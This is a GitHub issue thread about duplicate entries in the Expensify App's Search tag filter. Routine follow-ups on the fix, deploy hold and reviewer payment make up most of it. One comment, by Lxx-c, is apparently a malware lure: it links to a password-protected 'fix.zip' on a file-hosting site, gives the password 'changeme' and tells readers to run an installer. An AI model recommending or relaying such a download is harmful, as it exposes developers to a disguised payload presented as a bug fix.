### ISSUE TITLE
[HOLD for Payment 2024-09-6] [$250] [Search v2.1]  Tag filter has duplicates and generates console errors

### ISSUE THREAD

**Issue by 289Adam289** [Expensify/App#48005]
If you haven’t already, check out our [contributing guidelines](https://github.com/Expensify/ReactNativeChat/blob/main/contributingGuides/CONTRIBUTING.md) for onboarding and email contributors@expensify.com to request to join our Slack channel!
___

**Version Number:**
**Reproducible in staging?:** yes
**Reproducible in production?:** yes
**If this was caught during regression testing, add the test name, ID and link from TestRail:**
**Email or phone of affected tester (no customers):**
**Logs:** https://stackoverflow.com/c/expensify/questions/4856
**Expensify/Expensify Issue URL:**
**Issue reported by:**
**Slack conversation:**

## Action Performed:
- go to `/search/filters/tag`

## Expected Result:
No duplicates

## Actual Result:
Many duplicates

## Workaround:
Can the user still use Expensify without this being fixed? Have you informed them of the workaround?

## Platforms:

Which of our officially supported platforms is this issue occurring on?
- [x] Android: Native
- [x] Android: mWeb Chrome
- [x] iOS: Native
- [x] iOS: mWeb Safari
- [x] MacOS: Chrome / Safari
- [x] MacOS: Desktop

## Screenshots/Videos
![image](https://github.com/user-attachments/assets/d0299df1-7f17-4470-8900-9865cff671df)

Add any screenshot/video evidence

</details>

[View all open jobs on GitHub](https://github.com/Expensify/App/issues?q=is%3Aopen+is%3Aissue+label%3A%22Help+Wanted%22)

<details><summary>Upwork Automation - Do Not Edit</summary>
    <ul>
        <li>Upwork Job URL: https://www.upwork.com/jobs/~016f48b06e4d132623</li>
        <li>Upwork Job ID: 1828149808542651493</li>
        <li>Last Price Increase: 2024-08-26</li>
    </ul>
</details>

<details><summary>Issue Owner</summary>Current Issue Owner: @</details>

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 289Adam289** [comment]
@luacmartins The fix is easy and i can implement it.

**Comment by ikevin127** [comment]
⚠️ Automation failed here -> this should be on **[HOLD for Payment 2024-09-6]** according to today’s production deploy from https://github.com/Expensify/App/pull/47891#issuecomment-2322122640.

cc @lschurr @luacmartins

**Comment by lschurr** [comment]
Not overdue - Payment is on Friday.

**Comment by lschurr** [comment]
Payment summary:

- Contributor: @289Adam289 (contractor - no payment needed)
- Reviewer: @ikevin127 $250 (to be paid [in Upwork](https://www.upwork.com/nx/wm/offer/103847179))

**Comment by ikevin127** [comment]
@lschurr Offer accepted, thank you!

**Comment by lschurr** [comment]
All set!
